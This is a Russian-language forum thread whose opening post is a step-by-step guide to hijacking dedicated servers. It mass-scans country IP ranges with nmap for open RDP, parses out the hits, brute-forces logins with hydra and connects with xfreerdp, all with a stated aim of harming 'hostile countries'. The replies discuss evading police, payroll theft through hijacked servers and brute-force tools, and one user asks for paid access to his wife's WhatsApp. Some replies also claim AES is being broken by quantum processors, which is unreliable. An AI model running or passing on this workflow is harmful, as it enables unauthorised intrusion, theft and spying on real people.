Статья В поисках лучшего алгоритма по захвату дедиков в 2К18

CYBERSATORI EXPERIENCE 4 CAPTURE DEDICATED SERVERS ON LINUX SYSTEM // Мой опыт захвата дэдиксов с Лилы

CREATE NMAP SCRIPT FILE (Input All Major-IP Blocks of any Country here): // Оборачиваем следующие пару строк в скрипт, создаём пару txt-шек
http://www.ipdeny.com/ipblocks/ здесь можно посмотреть списки ипи-блоков по интересующей стране, но если воткнёте в подскан все разом, результаты придут к следующему году, так что не жадничаем и по-немножку сканим интересующую подсеть. Ведём журнал, записываем в блокнотик исследованые диапазоны.
Код:
c='Path/To/Your/Script/Here'
nmap -sS -p3389 -PS3389 -oG $c/scannedOnlineServers.txt -iL $c/hostsIPRange.txt -vv
CREATE PARSER FILE (to select only OK IP's list): // создаём сортировочную машинку которая извлечёт нам ипишки с открытым RDP портом.
Код:
p='/Path/To/Your/Script/Here'
grep -E '/open/' $p/scannedOnlineServers.txt | sed 's/Host: //' > $p/scanGhostFile.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -u > $p/openedServers.txt
sed 's/ .*//' $p/scanGhostFile.txt | sort | uniq -d » $p/openedServers.txt
rm $p/scanGhostFile.txt
PUT HYDRA COMAND (Best 4 Brute on Linux or use Metasploit experience): //ничего веселее гидры не нашлось, crowbar даёт ложные пробои и станится, поэтому загружаем пару топ-10 словарей (admin - password) и берём так сказать количеством, гидра хороша тем что не сильно нагружает процессор и в фоновом режиме может брутить сутки на пролёт не сильно задевая чувства верующих. В идеале думаю полезно разобраться и эксплойтить отсортированые ипишечки с Metasploit - но это уже тема для другой статьи, так как быстрых стандартных решений этого вопроса я пока не вижу.
Код:
hydra -L (loginTop10listHere) -P (passTop10listHere) -M (openedServersHere) -vV -o (SavedOKServers) rdp
TO CONTROL REMOTE DESKTOP : // входим в сбрученые оболочки и получаем профит
Код:
xfreerdp /u:LOGIN /p: PASSWORD /v:IP:3389
Так же предлагаю обсудить моё творчество, может у кого есть мысли на более рациональные варианты, пролистав весь рунет путнего по сабжу ничего не нашёл, решил выступить на данной конференции со своим мини-докладом. Всем спасибо за потраченое на мою статью время. Любая ваша критика, любые доводы уместны, но не обязательно будут приняты к рассмотрению. Удачных пробоев товарищи хэккерсы. Похороним экономику враждебно настроеных стран. Мы Анонисты - мы Легион! Так же отвечу на любые ньюби вопросы, если кто запутался в моей партянке.

6a472f3a81494f6d8a7a384181e85229.png
 
Последнее редактирование модератором:

Bypass

Green Team
02.02.2018
451
579
BIT
0
Так а ты чё, сидишь на форуме со своего реального ip и указал в профиле всю информацию о себе? Если да, тогда конечно лучше помалкивать и не рассказывать о лишнем. А если ты шифруешься как и я например, то можешь себе позволить свободу слова )
Я тоже был когда-то наивен начитавшись об анонимности, чем дальше изучаешь тем больше теория анонимности рассыпается ) писать на форумах просто слова это одно, если действовать это другое. Это мое ИМХО, моя позиция, никак не хочу оскорблять чувства верующих в анонимность. Проще сказать, смотря чем ты занимаешь в сетке и какой статус к себе присваиваешь, что ты сделал и кто будет тебя искать, если будут искать крутые дядьки они тебя и с луны достанут, ведь у них почти не ограниченный бюджет и армия профи в смене 24/7. Противостояние в одиночку ты физически не вывезешь.
p.s Не утверждаю - за скан и брут дедиков, крутые дядьки искать тебя естественно не будут, не тот уровень. Можешь выдохнуть )
 
Последнее редактирование:
  • Нравится
Реакции: Глюк

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
А я в анонимность верю, по крайней мере я верю в то, что проделав некоторые манипуляции найти человека становится сложнее, и тратиться будет на этого много денег и времени (месяца и года)...
Как иначе объяснить то, что сущеуствует много сервисов и форумов (и людей на этих форумах и сервисах). Которые продают долгие годы оружие, поддельные документы, деньги, наркотики, украденные кредитки, ой да чего только не продают. И это я сейчас говорю не про "дарк нет"... В обычном интеренете куча всего этого....
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Я тоже был когда-то наивен начитавшись об анонимности, чем дальше изучаешь тем больше теория анонимности рассыпается ) писать на форумах просто слова это одно, если действовать это другое. Это мое ИМХО, моя позиция, никак не хочу оскорблять чувства верующих в анонимность. Проще сказать, смотря чем ты занимаешь в сетке и какой статус к себе присваиваешь, что ты сделал и кто будет тебя искать, если будут искать крутые дядьки они тебя и с луны достанут, ведь у них почти не ограниченный бюджет и армия профи в смене 24/7. Противостояние в одиночку ты физически не вывезешь.
Странно что ты, не веря в анонимность занимаешься какими то делами, о которых ты, по своим же словам не хочешь что бы знал товарищ майор... То есть ты сам себя засадить хочешь? )

за скан и брут дедиков тебя крутые дядьки искать естественно не будут, не тот уровень. Можешь выдохнуть )
Ну смотря как, чьи дедики, и для чего брутить... Есть схема, по которой с дедиков, которыми пользуются компании, через "1С" воруют зарплату чуть ли не половины работников компании...
 
Последнее редактирование:

Bypass

Green Team
02.02.2018
451
579
BIT
0
Странно что ты, не веря в анонимность занимаешься какими то делами, о которых ты, по своим же словам не хочешь что бы знал товарищ майор... То есть ты сам себя засадить хочешь? )


Ну смотря как, чьи дедики, и для чего брутить... Есть схема, по которой с дедиков, которыми пользуются компании, через "1С" воруют зарплату чуть ли не половины работников компании...

интересно какими такими я делами занимаюсь )
про схемы с использования дедиков я не говорил, а сказал конкретнее за действие скан и брут а что далее ты на нем будешь делать это уже другой разговор.

"поддельные документы, деньги, наркотики, украденные кредитки"

Ну и чем кончил создатель такой площадки? Пожизненный срок, офигенный хэпиэнд. Скольких он за собой еще паровозом потянул, судебные решения давно читал? А сколько на ютубе оперативных съемок задержания неуловимых джо верующих в анонимность ) Годами не ловят говоришь, так папка на них еще пока толстеет, когда они станут нужны к ним приедут, неожиданно )
В принципе что тебе объяснять, это не моя задача, есть карающий орган это его задача.
Я просто наблюдаю как работает естественный отбор и беру себе на заметку.
И не стоит ровняться на них - "много сервисов и форумов (и людей на этих форумах и сервисах). Которые продают долгие годы оружие, поддельные документы, деньги, наркотики, украденные кредитки, ой да чего только не продают "

погугли лучше

Сотрудники ФБР США вышли на след петербургского хакера и «короля спама» Петра Левашова благодаря его учетной записи в iCloud.
Согласно судебным документам, опубликованным изданием The Verge, полиция следила за русским хакером с мая 2016 года.
В документах также описывается роль Левашова в управлении ботнетом Kelihos и проливается свет на то, как записи сервера, сообщения в Jabber и online-платежи вывели следователей на его след.

Два года карл папка на него толстела.
 
Последнее редактирование:

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
интересно какими такими я делами занимаюсь )
Я не знаю какие именно дела, ты не уточнил ). Твоя цитата - "Я не дурачок чтобы на публичной площадке описывать скажем так "свои методы взлома", мне потом следаку что говорить? Товарищь майор, это в теории, да я не хотел никого ломать. "
Ну и чем кончил создатель такой площадки? Скольких он за собой паровозом потянул? Ты судебные решения давно читал? А сколько на ютубе оперативных съемок задержания неуловимых джо верующих в анонимность ) Годами не ловят говоришь, так папка на них еще толстеет, когда они станут нужны к ним приедут, неожиданно )
Я не спорю что некоторые попадаются. А попадаются они потому что, либо какую то часть цепи про анонимность не знали, либо допустили ошибки... Я знаю что многие попадаются, да об этом все знают, ведь новости первым делом рассказывают о своих подвигах и заодно пугают тех кто хочет заняться подобным или уже занимается...
А вообще я сам знаю несколько форумов на которых одновременно продаются "поддельные документы, поддельные деньги, наркотики, украденные кредитки" и много всего запрещённого, и живут эти форумы ох как давно. И они популярные, что было понятнее, то посящаемость примерно в 4 раза больше чем у "codeby". А всё потому что они правильно пользуются анонимностью... И существование таких форумов и сайтов о многом мне говорит, а точнее - о том что при правильном подходе анонимным оставаться можно. Опять же повторюсь - что некоторые владельцы форумов попадаются, но только по своей вине.
А вообще вот тут можно посмотреть, что в одном из регионов, раскрываемость интернет преступлений менее 1% и это при том, что многие совершая интернет преступления вообще не заботятся об анонимсноть или заботятся минимально...
 
Последнее редактирование:

Глюк

Red Team
03.01.2018
1 185
1 879
BIT
177
наю несколько форумов на которых одновременно продаются "поддельные документы, поддельные деньги, наркотики, украденные кредитки" и много всего запрещённого, и живут эти форумы ох как давно.
так потому и живут такие форумы, что для соответствующих служб все и всё как на ладони. и продавцы и покупатели. и такие площадки могут ещё годы существовать, потому что это кому то удобно. ну а если Их что то не устроит, то небо в клеточку быстро обеспечат. прецеденты есть...
что касается анонимности и приватности, может это видео вам понравится. Анонимность в Интернете | Как скрыть свой IP
 

SearcherSlava

Red Team
10.06.2017
943
1 261
BIT
207
так потому и живут такие форумы, что для соответствующих служб все и всё как на ладони. и продавцы и покупатели. и такие площадки могут ещё годы существовать, потому что это кому то удобно. ну а если Их что то не устроит, то небо в клеточку быстро обеспечат. прецеденты есть...
что касается анонимности и приватности, может это видео вам понравится. Анонимность в Интернете | Как скрыть свой IP

Мудрый @Глюк, как всегда, прав, и даже если Мудрый @Глюк не прав, см.пункт первый. Посмотрел видео... Уж кто-кто, а Кевин Митник знает, о чем говорит, в свое время получил внеучетный доступ к компу из Университета Лойолы (покусился на иезуитов), поступил очень правильно, что, будучи евреем, не покусился на хасидов, сплавал в тундру, и пришел к выводу, что светлое безопаснее темного, в итоге стал уважаемым человеком и признанным экспертом в области ИБ.

1.jpg
 
  • Нравится
Реакции: Bypass и Глюк

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
так потому и живут такие форумы, что для соответствующих служб все и всё как на ладони. и продавцы и покупатели. и такие площадки могут ещё годы существовать, потому что это кому то удобно. ну а если Их что то не устроит, то небо в клеточку быстро обеспечат. прецеденты есть...
Есть и такие случаи как вы описали, но это далеко не всегда так...
что касается анонимности и приватности, может это видео вам понравится. Анонимность в Интернете | Как скрыть свой IP
Вот тут даже в самом начале видео эксперт говорит о том, что он может узнать информацию о любом человеке, то есть например взять человека и начинать его проверять и узнать о нём то что надо. Это да, это легче чем - найти человека который уже долгое время заражает компьютеры вирусами вымагателями. Потому что одно дело взять и пробивать одного нужного человека, а другое дело искать среди всех людей на планете того кто заражает компьютеры. Ведь если такой человек (который заражает компьютеры) использует много способов шифрования, много сервером с "vpn-нами" (качественными), удалённые рабочие компютеры, выходит в интернет с помощью дальнобойной антены, которая каждый раз ловит "вай фай" из разные публичных мест, подменяет о себе всегда все данные (днс, мак, ip, да вообще всё железо, все данные в браузере), соблюдает другие правила анонимности в сети - не переходит по подозрительным ссылкам, скачивает программы только в специальную среду, которая будет способствовать анонимности, ну и так далее...

А это кстате вы видео это озвучиваете? ) Просто у меня сложилось мнение, что этот канал пренадлежит кому то с этого форума...

Просмотрел я видео от начала до конца. Ну что могу сказать - видео полезно и информация на сколько я знаю там достоверная. Для себя же из этого видео я больше узнал про "SSH" соединения, раньше я думал что они хуже чем рассказано в видео.

Сам же я давно использую "tor", несколько штук самонастроенных "openvpn" (без ведения логов, с шифрованием и другими плюшками) и удалённые рабочие столы... В итоге получается очень длинная цепочка и что бы расспутать её всю, потребуется много времени и знаний.

Я конечно не спец в анонимности, но много вникал в эту тему и продолжаю вникать, не давно узнал новую информацию и буду вводить в свою "систему анонимности"...
 
  • Нравится
Реакции: Глюк

Bypass

Green Team
02.02.2018
451
579
BIT
0
Есть и такие случаи как вы описали, но это далеко не всегда так...

Вот тут даже в самом начале видео эксперт говорит о том, что он может узнать информацию о любом человеке, то есть например взять человека и начинать его проверять и узнать о нём то что надо. Это да, это легче чем - найти человека который уже долгое время заражает компьютеры вирусами вымагателями. Потому что одно дело взять и пробивать одного нужного человека, а другое дело искать среди всех людей на планете того кто заражает компьютеры. Ведь если такой человек (который заражает компьютеры) использует много способов шифрования, много сервером с "vpn-нами" (качественными), удалённые рабочие компютеры, выходит в интернет с помощью дальнобойной антены, которая каждый раз ловит "вай фай" из разные публичных мест, подменяет о себе всегда все данные (днс, мак, ip, да вообще всё железо, все данные в браузере), соблюдает другие правила анонимности в сети - не переходит по подозрительным ссылкам, скачивает программы только в специальную среду, которая будет способствовать анонимности, ну и так далее...

А это кстате вы видео это озвучиваете? ) Просто у меня сложилось мнение, что этот канал пренадлежит кому то с этого форума...

Просмотрел я видео от начала до конца. Ну что могу сказать - видео полезно и информация на сколько я знаю там достоверная. Для себя же из этого видео я больше узнал про "SSH" соединения, раньше я думал что они хуже чем рассказано в видео.

Сам же я давно использую "tor", несколько штук самонастроенных "openvpn" (без ведения логов, с шифрованием и другими плюшками) и удалённые рабочие столы... В итоге получается очень длинная цепочка и что бы расспутать её всю, потребуется много времени и знаний.

Я конечно не спец в анонимности, но много вникал в эту тему и продолжаю вникать, не давно узнал новую информацию и буду вводить в свою "систему анонимности"...
"Я конечно не спец в анонимности" - я о том же, когда ты станешь в этом вопросе более менее спец, сделаешь для себя очень много выводов. И желаю тебе раскурить тщательно вопрос об "почти анонимен" до того как тебя закроют.

Не зная брода, не суйся в воду. © Народная поговорка.
 

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
"Я конечно не спец в анонимности" - я о том же, когда ты станешь в этом вопросе более менее спец, сделаешь для себя очень много выводов. И желаю тебе раскурить тщательно вопрос об "почти анонимен" до того как тебя закроют.

Не зная брода, не суйся в воду. © Народная поговорка.

Меня то за что закрывать? Я чист как белый снег не приземлившийся на землю )

И ты кстате не принимай мою писанину близко к сердцу, я это не на злой волне, просто общаюсь ) Изначально я хотел тебя побудить выкладывать больше информации сюда просто )
 

Глюк

Red Team
03.01.2018
1 185
1 879
BIT
177
А это кстате вы видео это озвучиваете? ) Просто у меня сложилось мнение, что этот канал пренадлежит кому то с этого форума...
нет, это не я озвучиваю и не мой канал. но вы правы, это канал нашего коллеги с форума.
 
  • Нравится
Реакции: Langolier

Bypass

Green Team
02.02.2018
451
579
BIT
0
Меня то за что закрывать? Я чист как белый снег не приземлившийся на землю )

И ты кстате не принимай мою писанину близко к сердцу, я это не на злой волне, просто общаюсь ) Изначально я хотел тебя побудит выкладывать больше информации сюда просто )
Насчет закрытия я о том что прежде чем что-то натворить в тебе была осознанность а достаточно ли ты прикрыл зад и кто твой враг.
Я не принимаю к сердцу, я без эмоций, чисто на фактах. Моя цель в том что ненужно сильно уповать на анонимность, ненужно иллюзий.
Я могу теоретически создать анонимность и супер мега связок и фейков и также теоретически могу ее раскрыть. Даже в том что у большого брата есть квантовый проц который за минуты дешифрует самые стойкие алгоритмы которые есть на данный момент. Я не думаю что это шутки, вполне очевидно с быстрым развитием технологий. Даже гугл все тяжелее и тяжелее обманывать, гайки вон на днях закрутил с проксями, так что программисты ниделю уже в напряге. ББ всегда будет на шаг впереди. Корпорация Google представила 72-кубитный квантовый процессор Bristlecone. С помощью этого процессора подразделение Google Quantum AI lab, ответственное за разработку квантового компьютера, будет тестировать системные ошибки и масштабируемость технологии, а также области применения квантовой симуляции, оптимизации и машинного обучения «для решения проблем реального мира», как .
Так что потихоньку летят в тартарары все впны, соксы, ссш и т.д.
Хвалёный AES находятся сейчас на последнем издыхании. И современные методы шифрования имеют неустранимый критический недостаток.
Провал шифровального механизма, ключей означает, что буквально вся перехваченная за многие лета информация будет прочитана
Что будет дальше наблюдаю.
 
Последнее редактирование:
  • Нравится
Реакции: Mitistofel

Mitistofel

Green Team
03.06.2018
264
151
BIT
0
Даже в том что у большого брата есть квантовый проц который за минуты дешифрует самые стойкие алгоритмы которые есть на данный момент. Я не думаю что это шутки, вполне очевидно с быстрым развитием технологий. Даже гугл все тяжелее и тяжелее обманывать, гайки вон на днях закрутил с проксями, так что программисты ниделю уже в напряге. ББ всегда будет на шаг впереди, Гугл пачками сейчас закупает квантовые процы. Так что потихоньку летят в тартарары все впны соксы и т.д
Это конечно всё мало приятные известия, но всё же я стараюсь быть максимально анонимым, используя те знания, которые уже имею...
 
I

inehy

Вроде написано хорошо, и метод теоретически должен быть рабочим, только полезности в ней очень мало. Алгоритм брута дедиков - скан диапазонов адресов с последующим брутом, это так. Но если забить в гугл "сканирование портов", то вылезет куча материала по nmap, а если забить "брут паролей", то по hydra. Типа, автор предлагает для сканирования портов и их брута пользоваться самыми распространенными инструментами с самыми обычными опциями. Единственное что полезного это bash-код с grep для сортировки результатов, потому что впервые столкнувшись с grep можно голову сломать, кто пробовал с нуля с ним разобраться тот поймет. Ну, и да, в 2к18 сканирование диапазонов на стандартный порт и брутфорс словарных паролей больше не работают. Надо понимать, что машины, на которых открыт rdp это чаще всего корпоративные сервера, которые администрируют вполне квалифицированные люди, среди которых, конечно, попадаются раздолбаи, но все реже и реже, и тем реже, чем чаще их атакуют, а атакуют их все чаще и чаще.
Найти сервер, который администрирует раздолбай, среди миллионов машин, и то, что у этого раздолбая будет словарный пароль из твоего словаря это огромная удача, рассчитывать на которую имеет смысл, если ты очень хочешь сбрутить первый дедик в своей жизни по мануалу из интернета.
 
  • Нравится
Реакции: Cyber Satori

krypt0n

Green Team
12.11.2017
139
68
BIT
0
RDPForcer и z668 конечно хорошо что распознают логины, но это очень долго и требуют мощный дедик, главное составить правильные листы логин пароль.
Я использую NLBrute, меня всё устраивает

Посмотреть вложение 19479

А потом еще все гуды чекаю в полуавтоматическом режиме своим простеньким софтом, дабы не пропустить ни один гуд
Посмотреть вложение 19481
какую верс юзаешь?
 
К

Коник67

Парни, привет. Нужно посмотреть воцап жены. Кто поможет.?( небезвозмездно)
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!